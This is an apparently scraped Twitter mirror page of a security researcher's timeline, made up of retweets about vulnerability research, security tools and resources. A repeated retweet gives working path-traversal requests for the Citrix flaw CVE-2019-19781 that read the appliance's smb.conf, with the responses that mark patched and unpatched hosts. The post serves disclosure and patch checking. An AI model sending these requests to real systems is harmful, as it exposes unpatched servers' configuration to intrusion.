![jas502n's tweet photo. CVE-2019-19781 Citrix path traversal base on vpns folder
Example:
GET /vpn/../vpns/services.html
GET /vpn/../vpns/cfg/smb.conf
patch >> HTTP/1.1 403 Forbidden
no patch >> HTTP/1.1 200 OK
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast https://t.co/a6ehfTRIaJ](https://pbs.twimg.com/media/ENwii8IU0AAvb68.jpg)
![jas502n's tweet photo. CVE-2019-19781 Citrix path traversal base on vpns folder
Example:
GET /vpn/../vpns/services.html
GET /vpn/../vpns/cfg/smb.conf
patch >> HTTP/1.1 403 Forbidden
no patch >> HTTP/1.1 200 OK
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast https://t.co/a6ehfTRIaJ](https://pbs.twimg.com/media/ENwii8HVAAEXLY4.jpg)
Olivia
Online
Semyon Rozhkov
@sam_in_cube
Agentic security and research at @SentinelOne / Exploring frontiers / Views of my own
World
Joined September 2010
351 Following
484 Followers
2.5K Posts
@reach_vb May I join?
https://t.co/V7BSUMCcQB
Build what learns
You can just do things
do not, my friends, become addicted to cracked engineer culture. that way lies building mountains of cancerous abstractions that amount to nothing, yakshaving for decades until you are forgotten by history. follow instead your natural curiosities and your pursuit of divine glory
Fancy some vuln reading/watching for the weekend? here's some awesome Cloud bugs!
https://t.co/vbUD6Up1pc
Wanted to know what info is logged and what's not? Well, now you can know.
Congrats to Google Security for putting together this PoC of the "web version" of Spectre. Very happy to see how an academic research went into a real-world working demo. Congrats to the whole team, including our academic friends. Give it a try now https://t.co/oGIUapPUak @_tsuro
JSON Interoperability vulnerabilities sound like they have some serious bug-bounty potential. Nice work once again by @theBumbleSec/@bishopfox
https://t.co/uHCGJAmt4f
Game on!
Reverse Engineering Go Binaries with Ghidra
https://t.co/ot4v4VshUV
Google Cloud Privilege Escalation Cheat Sheet https://t.co/tThuIIETn6
New expansion touching the 3 things we love 😍 the most: CTF, VRP, and OSS https://t.co/v66f0uVkSD
This is a great exploration of an under-appreciated technique by @RobinVerton. Alas it's a pain to detect black-box: that's the reason param miner has an option called "try -_ bypass".
https://t.co/Aw2taY4TsP
@sirdarckcat So it's bughunterhunting time!
Happy Monday! We are trying to be here for you in these unprecedented times. #stayhome #bughunter
https://t.co/eKHM7j3EYZ
We launched our new Malware Evasion Encyclopedia, which contains over 50 techniques used by various malwares to detect virtualized and sandboxed environments.
We hope this effort would allow for better understanding and analysis of modern attacks.
https://t.co/NVCp10sUiv
CVE-2019-19781 Citrix path traversal base on vpns folder
Example:
GET /vpn/../vpns/services.html
GET /vpn/../vpns/cfg/smb.conf
patch >> HTTP/1.1 403 Forbidden
no patch >> HTTP/1.1 200 OK
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast
![jas502n's tweet photo. CVE-2019-19781 Citrix path traversal base on vpns folder
Example:
GET /vpn/../vpns/services.html
GET /vpn/../vpns/cfg/smb.conf
patch >> HTTP/1.1 403 Forbidden
no patch >> HTTP/1.1 200 OK
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast https://t.co/a6ehfTRIaJ](https://pbs.twimg.com/media/ENwii8IVAAARgYq.png)
We're looking to hire a web vulnerability researcher to join @garethheyes and I on the @Burp_Suite research team, and share their knowledge with the community via @WebSecAcademy
https://t.co/UVNEkdyZGB
Last Seen Users on Sotwe
Joe Henry
Seen from United Kingdom
家有(XFL)
Seen from United States
VAV GALAXY - Vũ trụ SEX & SOME chất VN
Seen from Vietnam
陈谜陆
Seen from Vietnam
เรื่องเล่าประสบการณ์สุดเสียว
Seen from Thailand
قصص واعترافات
Seen from Jordan
Marcus BK
Seen from Germany
安徽第一铁蛋
Seen from United States
Brendan Carroll
Seen from Germany
Noor&rahim21
Seen from Germany
Most Popular Users
Elon Musk 
@elonmusk
240.4M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.5M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.4M followers
Taylor Swift
@taylorswift13
81.2M followers
Lady Gaga
@ladygaga
72.8M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.5M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.7M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.2M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.5M followers